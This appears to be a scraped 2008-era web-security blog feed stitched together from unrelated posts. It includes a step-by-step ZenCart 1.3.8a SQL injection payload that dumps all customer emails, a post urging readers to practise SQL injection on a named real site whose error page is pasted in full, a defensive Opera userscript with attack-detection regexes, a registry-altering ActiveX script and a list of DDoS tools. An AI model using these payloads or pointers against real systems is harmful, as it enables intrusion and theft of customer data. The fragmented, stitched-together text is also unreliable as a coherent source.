Web Security
Microsoft RDP.
source: OWASP News
ZenCart 1.3.8a SQL Injection
Unfortunately an sql injection vulnerability was discovered in Zencart v.1.3.8a
In order to test it please follow some simple steps:
1. go to the product listing page by clicking a category
2. save the page on your pc, open it in a text editor and modify (assuming there is a product with the id 111 or whatever….)
<input name=”products_id[111]” size=”4″ type=”text” value=”0″ />
to
<input name=”products_id[-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*] ” size=”4″ type=”text” value=”0″ />
3. submit the form by adding at least one product to cart for the modified input box.
The result will be that a comma separated list of all customer emails will be shown.
In order to protect against this attack you can apply the following security patch:
http://www.zen-cart.com/forum/showthread.php?p=604473
Covert Manipulation.
I've been interested in communication for a long time, and I am especially interested in the use of language for persuasion. Once you know how powerful words really are, you'll start using them with care. The conscious mind behaves in patterns and that those patterns can be broken. It's also possible to embed hidden commands inside language in order to trigger a response from someone. In fact, you can break the thought pattern of someone and replace it with yours. This can be easily proven. You read my words I typed here, they entered your mind in both a consciousness and unconsciousness way. I transferred my thoughts into your thoughts, unconsciously I might have given new instructions to change your feeling or ideas about something in a covert way. You are probably aware of this already, because certain words make you feel different than other words. Hacking the mind through covert manipulation is easier than you might have thought. Ask yourself, what impression did I gave just now? what did I change you weren't aware of before reading this text? Which thoughts are yours and which were mine? and how will they affect the rest of your day?
source: OWASP News
Oscommerce Sql Injection
WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.
Ever wanted to check how an sql injection might work with an oscommerce store?
› Continue reading
Secure Coding And Cocktail Parties.
I am going to be very clear about his today. In the past I posted vulnerabilities in many websites including websites from companies who say they secure web applications, or store web application vulnerabilities and even those who give out certifications like (ISC)2, and I left out those who talk about application security while using insecure software packages to speak about it, because yeah, it's not their fault is it? What does that say about them? Well, for starters it's the same thing like having a police officer committing a crime. It's about time for some introspective analysis for each and everyone in the web application security field before this stuff get's further out of control. No wonder no one takes web application security and it's experts serious, look at the mess around you and your application security vendor who fails to secure himself. So when I see the secure coding group from cert talk about secure coding standards[1] I get really disappointed when they are vulnerable themselves. It's not like we are dealing with a space mission to Mars for example, it's just web application security for fuck sake! something that can be explained to any 5th grader on four sheets of paper.
Judge for yourself, always useful to gain some extra SQL practice in real life:
A system error has occurred � our apologies! Please ask your Confluence administrator to create a support issue on Atlassian's support system at http://support.atlassian.com with the following information: 1. a description of your problem and what you were doing at the time it occurred 2. a copy of the error and system information found below 3. a copy of the application logs (if possible). Your Confluence administrator can use the support request form to create a support ticket which will include this information. We will respond as promptly as possible. Thank you! Return to site homepage� Cause java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74) caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46) caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153) Stack Trace:[hide] java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74) at com.atlassian.confluence.search.actions.SearchSiteAction.exactUsernameSearch(SearchSiteAction.java:286) at com.atlassian.confluence.search.actions.SearchSiteAction.getContributors(SearchSiteAction.java:237) at com.atlassian.confluence.search.actions.SearchSiteAction.validate(SearchSiteAction.java:158) at com.opensymphony.xwork.interceptor.DefaultWorkflowInterceptor.intercept(DefaultWorkflowInterceptor.java:44) at com.atlassian.confluence.core.ConfluenceWorkflowInterceptor.intercept(ConfluenceWorkflowInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.CaptchaInterceptor.intercept(CaptchaInterceptor.java:46) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.util.LoggingContextInterceptor.intercept(LoggingContextInterceptor.java:48) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.CancellingInterceptor.intercept(CancellingInterceptor.java:23) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.actions.PermissionCheckInterceptor.intercept(PermissionCheckInterceptor.java:54) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.CommentAwareInterceptor.intercept(CommentAwareInterceptor.java:43) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.PageAwareInterceptor.intercept(PageAwareInterceptor.java:120) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.spaces.actions.SpaceAwareInterceptor.intercept(SpaceAwareInterceptor.java:67) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:39) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:25) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:97) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115) at com.opensymphony.webwork.dispatcher.ServletDispatcher.serviceAction(ServletDispatcher.java:229) at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199) at javax.servlet.http.HttpServlet.service(HttpServlet.java:803) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:118) at com.atlassian.confluence.util.profiling.ProfilingPageFilter.parsePage(ProfilingPageFilter.java:153) at com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:54) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.jmx.JmxFilter.doFilter(JmxFilter.java:109) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.ServletContextThreadLocalFilter.doFilter(ServletContextThreadLocalFilter.java:21) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.LoggingContextFilter.doFilter(LoggingContextFilter.java:49) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.UserThreadLocalFilter.doFilter(UserThreadLocalFilter.java:44) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:192) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:120) at com.atlassian.confluence.util.AbstractBootstrapHotSwappingFilter.doFilter(AbstractBootstrapHotSwappingFilter.java:28) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:125) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.ClusterHeaderFilter.doFilter(ClusterHeaderFilter.java:35) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.johnson.filters.AbstractJohnsonFilter.doFilter(AbstractJohnsonFilter.java:72) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.springframework.orm.hibernate.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:170) at com.atlassian.spring.filter.FlushingSpringSessionInViewFilter.doFilterInternal(FlushingSpringSessionInViewFilter.java:29) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:75) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.util.profiling.filters.ProfilingFilter.doFilter(ProfilingFilter.java:142) at com.atlassian.core.filters.ProfilingAndErrorFilter.doFilter(ProfilingAndErrorFilter.java:27) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.core.datetime.RequestTimeThreadLocalFilter.doFilter(RequestTimeThreadLocalFilter.java:34) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.RequestCacheThreadLocalFilter.doFilter(RequestCacheThreadLocalFilter.java:25) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.gzipfilter.GzipFilter.doFilterInternal(GzipFilter.java:94) at com.atlassian.gzipfilter.GzipFilter.doFilter(GzipFilter.java:64) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.AbstractEncodingFilter.doFilter(AbstractEncodingFilter.java:33) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.valves.FastCommonAccessLogValve.invoke(FastCommonAccessLogValve.java:482) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:595) Caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:15) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.addSubQueries(BooleanQueryMapper.java:43) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.convertToLuceneQuery(BooleanQueryMapper.java:29) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:52) ... 113 more Caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:42) ... 119 more Referer URL Unknown Confluence Application Information Build Information buildNumber: 1418 upTime: 2 days, 2 hours, 12 minutes, 11 seconds devMode: false version: 2.9.1 home: /var/lib/confluence Unique ID: 0x0000011D5EDA2F53458D112A3234C9F2472F5C45C3AF54AE9C867DF600E1355 Server information Application Server: Apache Tomcat/5.5.26 Servlet Version: 2.4 Database Dialect: com.atlassian.hibernate.dialect.MySQLDialect Database Driver Name: com.mysql.jdbc.Driver Database Driver Version: 5.0 Database Name: MySQL Database Version: 4.1.22 Database Transaction Isolation: Repeatable read Database Latency: 0 Memory Information Total Memory: 1016 MB Used Memory: 913 MB Free Memory: 103 MB System Information userName: tomcat favouriteColour: Sangria time: 08:05:12 javaVm: Java HotSpot(TM) Client VM operatingSystemArchitecture: i386 date: Friday, 24 Oct 2008 operatingSystem: Linux 2.6.9-78.0.1.ELsmp jvmVersion: 1.0 userTimezone: US/Eastern fileSystemEncoding: UTF-8 jvmImplementationVersion: 1.5.0_16-b02 appServer: Apache Tomcat javaVendor: Sun Microsystems Inc. javaVersion: 1.5.0_16 javaRuntime: Java(TM) 2 Runtime Environment, Standard Edition jvmVendor: Sun Microsystems Inc. Cluster Information Not clustered. Plugins * Add Content Menu Sections (confluence.menu.add, Version: 1.0) * Admin Sections (confluence.sections.admin, Version: 1.0) * Advanced Macros (confluence.macros.advanced, Version: 1.4.2) * Attachment Actions (confluence.sections.attachments, Version: 1.0) * Attachment Extractors (com.atlassian.confluence.plugins.attachmentExtractors, Version: 1.0-SNAPSHOT) * Basic Macros (confluence.macros.basic, Version: 1.4) * Browse Menu Items (confluence.sections.browse, Version: 1.0) * Chart Plugin (confluence.extra.chart, Version: 1.11) * Clickr Theme (com.atlassian.confluence.themes.clickr, Version: 2.2) * Code Macro (confluence.macros.code, Version: 1.5) * Comment Action Sections (confluence.comment.action, Version: 1.0) * Confluence Atlassian Plugin Repository (confluence.repository.client, Version: 2.0.15) * Confluence Attachments Plugin (confluence.extra.attachments, Version: 2.10) * Confluence Classic Theme (com.atlassian.confluence.themes.classic, Version: 2.0) * Confluence Contributors Plugin (com.atlassian.confluence.contributors, Version: 1.2) * Confluence Usage Stats (com.atlassian.confluence.ext.usage, Version: 0.8) * Content Action Menu Sections (confluence.content.action.menu, Version: 1.0) * Content Buttons (confluence.sections.page.temp, Version: 1.0) * Core Extractors (confluence.extractors.core, Version: 1.4) * Core Listeners (confluence.listeners.core, Version: 1.3) * Core Path Converters (confluence.converters.core, Version: 1.0) * Core Startup and Shutdown (confluence.lifecycle.core, Version: 1) * Dashboard Macros (confluence.macros.dashboard, Version: 1.4.2) * Default Theme (com.atlassian.confluence.themes.default, Version: 1.0) * Dynamic Task List 2 Plugin (confluence.extra.dynamictasklist2, Version: 3.0.6) * Edit Profile Sections (confluence.sections.profile.edit, Version: 1.0) * French language pack (confluence.languages.fr_FR, Version: 1.8) * German language pack (confluence.languages.de_DE, Version: 1.3) * Global Labels Sections (confluence.sections.labels, Version: 1.0) * Information Macros (confluence.extra.information, Version: 1.0) * Layout Macros (confluence.extra.layout, Version: 1.1) * Left Navigation Theme (com.atlassian.confluence.themes.leftnavigation, Version: 2.0) * Live Search Macros (confluence.extra.livesearch, Version: 2.8) * News Tabs (confluence.sections.news, Version: 1.0) * Page Operations (confluence.sections.page.operations, Version: 1.0) * Page Tabs (confluence.sections.page, Version: 1.0) * Page Tabs (confluence.search.mappers.lucene, Version: 1.0) * Page Tree (com.atlassian.confluence.plugins.pagetree, Version: 1.10) * Page View Links (confluence.sections.page.actions, Version: 1.0) * Profile Tabs (confluence.sections.profile, Version: 1.0) * Search Web Interface (confluence.sections.search.view, Version: 1.0) * Space Actions Sections (confluence.sections.space.actions, Version: 1.0) * Space Admin Sections (confluence.sections.space.admin, Version: 1.0) * Space Advanced Sections (confluence.sections.space.advanced, Version: 1.0) * Space Browse Sections (confluence.sections.space.browse, Version: 1.0) * Space Item Tabs (confluence.sections.space, Version: 1.0) * Space Labels Sections (confluence.sections.space.labels, Version: 1.0) * Space Pages Sections (confluence.sections.space.pages, Version: 1.0) * System Web Resources (confluence.web.resources, Version: 1.0) * Table of Contents Plugin (org.randombits.confluence.toc, Version: 2.4.8) * Tabular Metadata (confluence.extra.masterdetail, Version: 2.7) * TinyMCE Editor Plugin (com.atlassian.confluence.extra.tinymceplugin, Version: 3.0-rc2) * User Lister (confluence.extra.userlister, Version: 2.4) * User Menu Sections (confluence.user.menu, Version: 1.0) * View Profile Web Interface (confluence.sections.profile.view, Version: 1.0) * Wiki Renderer Components (confluence.renderer.components, Version: 1.0) Request Information URL https://www.securecoding.cert.org/confluence/500page.jsp URI /confluence/500page.jsp Context Path /confluence Servlet Path /500page.jsp Query String queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername= Headers (Limited subset) host www.securecoding.cert.org user-agent Mozilla/1.0 (Windows; U; Windows NT 1.1; en-US; rv:2.9.0.3) Gecko/2002016217 keep-alive 300 connection keep-alive Attributes javax.servlet.forward.request_uri /confluence/dosearchsite.action javax.servlet.forward.context_path /confluence javax.servlet.forward.servlet_path /dosearchsite.action javax.servlet.forward.path_info /500page.jsp javax.servlet.forward.query_string queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername= javax.servlet.error.message javax.servlet.error.exception java.lang.IllegalArgumentException: Invalid search query found in specified search. os_securityfilter_already_filtered true com.atlassian.johnson.filters.JohnsonFilter_already_filtered true __sitemesh__using_stream false javax.servlet.error.request_uri /confluence/dosearchsite.action com.atlassian.gzipfilter.GzipFilter_already_filtered true javax.servlet.error.status_code 500 __sitemesh__filterapplied true javax.servlet.error.servlet_name action webwork.valueStack com.opensymphony.xwork.util.OgnlValueStack@e2a5ac Confluence-Request-Time 1224851735677 loginfilter.already.filtered true atlassian.core.seraph.original.url /dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername= javax.servlet.jsp.jspException java.lang.IllegalArgumentException: Invalid search query found in specified search. sessioninview.FILTERED true Parameters (Limited subset) queryString "> "> contributorUsername type where conf_all lastModified contributor "> Confluence User anonymous
^ Oops, besides this hideous blob of intelligence it also let us modify the SQL query. Finally something really interesing to discuss at those cocktail parties or is it?
[1] https://www.securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standards
source: OWASP News
Opera Arioso Update.
I've made some updates on my Opera plugin to block and protect more attacks against Opera. Luckily there aren't that many attacks in comparison to other browsers, nonetheless I like to notice what happens on webpages I visit. The minor updates are based upon Gareth Heyes Unicode loop circumvention for Arioso's active heapspraying and buffer overflow detection, setPreference and more strict opera: scheme blocking based upon Aviv Raff and Stefano Di Paola, Roberto Suggi Liverani's new proof of concepts. Arioso already did protect against the proof of concepts on hyperlinks, but lacked additional heuristics on sources. Please notice that Arioso does not block Javascript, instead it analyzes a document, it's Javascript and based on attack heuristics determines whether to block the scripts from executing before the page has a chance to load the scripts. Arioso also detects attacks against Internet Explorer and Firefox, while this does not affect Opera, it's always nice to know that the page in question tries to execute an attack against you. One key feature in Arioso is the possibility in using Opera with a very strict same origin policy, this is and was enabled by default, and denies any cross context sourcing from Javascript files. This means that any script content that is loaded from another context than you are in, will be blocked by default.
You can download the new version of Arioso here: http://www.0×000000.com/arioso.js
The Arioso source can be loaded into Opera. To enable user JavaScript, use Tools > Preferences > Advanced > Content > JavaScript options, and select the directory where you will put your User JavaScript files. Opera will load all files in the specified directory whose names end with .js and will use them as User JavaScript files. Use Opera with Arioso, and you'll be more secure than any other browser available right now.
(function(opera){
/*
~~~ Opera Arioso! ~~~ Active browser vulnerability detection & protection by rvdh, 0x000000.com
$revisions$ update: 20/7/2008: 7:15 PM, keylog pattern adjusted. update: 22/10/2008: 23:00 PM, unicode loop detection. update: 23/10/2008: 4:19 PM, blocks opera:* on sources, blocks intranet access. credits: Rvdh, Gareth Heyes, Roberto Suggi Liverani, Aviv Raff, Stefano Di Paola
*/
// Arioso magic variables
window.opera.defineMagicVariable('arioso_links', function() {}, null);
window.opera.defineMagicVariable('arioso_alert', function() {}, null);
// Set strict same origin policy:
var arioso_strict_sop = true;
// Arioso variables
var arioso_links = document.links;
var arioso_alert = "";
var crlf = ". \r\n";
// Arioso messages
var m1 = 'Unsafe URI hyperlink schemes';
var m2 = 'Denial of service vector';
var m3 = 'Heapspraying or denial of service vector';
var m4 = 'VBInjection';
var m5 = 'Cookie stealing';
var m6 = 'Same origin policy violation';
var m7 = 'Keylogging';
var m8 = 'Script access';
var m9 = 'ActiveX access';
var m10 = 'Java access';
var m11 = 'Http response splitting';
var m12 = 'Preference hijacking';
// Arioso patterns
var p1 = /^(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p2 = /for\s*\(\s*.*([a-z]|[0-9])\s*\=\s*.*([a-z]|[0-9])\s*;\s*.*([a-z]|[0-9])\s*(<|>|<=|>=|<==|>==)\s*[0-9]{3,}\s*;\s*/gim;
var p3 = /(while|for|space|block|memory).*unescape\(("|')(%[0-9]|\\x|\\u)([a-z]|[0-9])("|')\)/gim;
var p4 = /String\(\s*.*([a-z]|[0-9]){6,},\s*"[a-z]"\)/gim;
var p5 = /(http|https):\/\/.*\?.*=.*(\+|concat|join).*document\.(cookie|domain)/gim;
var p6 = /(src|href|location|data|classid|codebase|open)\s*(=|\().*(chrome|file|opera|res|data|telnet|about|resource|view-source|acrobat|localhost|loopback|127\.|192\.)\s*(:|\.)/gim;
var p7 = /(\.keyCode|\.keypress|(e|event)\.charCode)/gim;
var p8 = /(bad_arioso_schemes|arioso_links|arioso_schemes|arioso_sanitize_xss)/gim;
var p9 = /(ActiveXObject\(("|').*Shell("|')\)|HKEY\_)/gim;
var p10 = /(java\.(sun|awt)|packages\.(.*)(plugin|javascript))/gim;
var p11 = /open\(("|')\s*(GET|TRACE|POST)\s*("|').*(\\r|\\r\\n|\\n|(%[0-9]|\\x|\\u)([a-z]|[0-9])).*\)/gim;
var p12 = /.*opera\.setPreference.*/gim;
// strict same origin policy detection
if(arioso_strict_sop == true) { window.opera.addEventListener('BeforeExternalScript', function(e) { if (!e.element.getAttribute('src').match(document.location)) { e.preventDefault(); } }, false);
}
// Arioso link enumerator detecting bad uri schemes
window.addEventListener('DOMContentLoaded', function(e) { for (i = 0; i < arioso_links.length; i++) { entity = arioso_links[i].toString(); if (entity.match(p1)) { arioso_alert += m1; } }
}, false);
window.opera.addEventListener('BeforeScript', function(e) {
if (e.element.text.match(p2)) { arioso_alert += m2 + crlf; e.preventDefault(); } if (e.element.text.match(p3)) { arioso_alert += m3 + crlf; e.preventDefault(); } if (e.element.text.match(p4)) { arioso_alert += m4 + crlf; e.preventDefault(); } if (e.element.text.match(p5)) { arioso_alert += m5 + crlf; e.preventDefault(); } if (e.element.text.match(p6)) { arioso_alert += m6 + crlf; e.preventDefault(); } if (e.element.text.match(p7)) { arioso_alert += m7 + crlf; e.preventDefault(); } if (e.element.text.match(p8)) { arioso_alert += m8 + crlf; e.preventDefault(); } if (e.element.text.match(p9)) { arioso_alert += m9 + crlf; e.preventDefault(); } if (e.element.text.match(p10)) { arioso_alert += m10 + crlf; e.preventDefault(); } if (e.element.text.match(p11)) { arioso_alert += m11 + crlf; e.preventDefault(); } if (e.element.text.match(p12)) { arioso_alert += m12 + crlf; e.preventDefault(); }
}, false);
document.addEventListener('load', function(e) {
if (arioso_alert != '' ) { var ary = document.createElement('div'); ary.style.position = 'fixed'; ary.style.top = '0px'; ary.style.left = '0px'; ary.style.width = '100%'; ary.style.opacity = '.90'; ary.style.filter = 'alpha(opacity=90)'; ary.style.border = '1px dotted #f30'; ary.style.padding = '3px'; ary.style.font = '8pt sans-serif'; ary.style.backgroundColor = '#f00'; ary.style.color = '#fff'; ary.appendChild(document.createTextNode('ARIOSO BLOCKED: ' + arioso_alert)) document.body.appendChild(ary); }
}, false);
})(window.opera);
source: OWASP News
Disable RPC.
There is some fuss about RPC on Windows platforms.[1] As usual, I recommend to disable RPC temporarily from starting up when Windows boots. RPC is nasty and yet again a severe flaw has been found that attackers can abuse to take over a remote PC, and it doesn't require user interaction. An attacker can just send a RPC request remotely and take over your PC, including but not limited to use it to spread worms. It's highly recommended that you temporarily turn RPC off if you didn't already do that. I wrote a small script that can do it for you in Internet Explorer, if you trust me of course! If you haven't got Internet Explorer you can do it manually as well.
Save the script as HTML and run it from your desktop or intranet.
<script language="JavaScript">
HKEY="HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\RpcSs\\Start";
function lockdownRPC() { try { var keylock = new ActiveXObject("WScript.Shell"); keylock.RegWrite(HKEY,0x00000004); alert('RPC start value set to: 0x00000004, Run > services.msc > RPC and change the startup type to manually or disabled.'); keylock.Run("CMD /c services.msc"); } catch(e){ alert('Key could not be altered, do it manually please.'); }
}
</script>
<input type="button" value="Turn off RPC" onclick="lockdownRPC()">
Be cautious when working with RPC, the above script disables RPC which is something Windows normally does not allow. It is possible that some programs stop working after booting, so it is advised to set RPC to manually in the services.msc after running the script that unlocks the registry. If you want to do a rollback, just run the script again and enable RPC again.
[1] http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
source: OWASP News
New and old DDOS Tools
For sure this list is not intended to newbies that want to start a DDOS attack. This list is to inform the readers of what tools new and old the hackers use for their denial-of-service attacks. It’s interesting to see how this tools have evolved and improved over time.
In relatively cronologic order here are the DDOS tools that are in use today:
Trinoo, or Trin00 appeared in 1999 is a distributed SYN DoS attack
The Tribe Flood Network (TFN) is able to implement attacks such as ICMP flood, SYN flood, UDP flood, and SMURF. Communication from the TFN client to daemons is accomplished via ICMP ECHO REPLY packets. The absence of TCP and UDP traffic sometimes makes these packets difficult to detect because many protocol monitoring tools are not even configured to capture and display the ICMP traffic.
Stacheldraht is a combination between trinoo and TFN. Additionally it encrypts master – attacker traffic and the agents (the zombies – computers from where the DDOS attack is launched) have the possibility of auto updating.
Apache DDOS – it uses a vulnerability in Apache versions prior to 1.2.5 (a URL sent to an Apache Web server containing thousands of forward slashes (“/”) would put the server into a state that would consume enormous CPU time)
Trinity. This distributed denial-of-service attack has the interesting feature that the communication between the intruder and his agents/zombies is accomplished via Internet Relay Chat (IRC) or AOL’s ICQ which makes it even harder to track it back.
Shaft DDoS, similar to trinoo has the ability to configure the packet size and duration of the attack.
Tribe Flood Network 2K (TFN2K) TFN2K is a complex variant of the original TFN with features designed specifically to make TFN2K traffic difficult to recognize and filter, remotely execute commands, hide the true source of the attack using IP address spoofing, and transport TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP. TFN2K attacks include flooding (as in TFN) and those designed to crash or introduce instabilities in systems by sending malformed or invalid packets, such as those found in the Teardrop and Land attacks.
SubSeven Defcon8 – while this is not a DDOS tools it’s a worm used to collect zombies computer. It can spread through websites (adult sites…), email etc…
Phishing With Google.
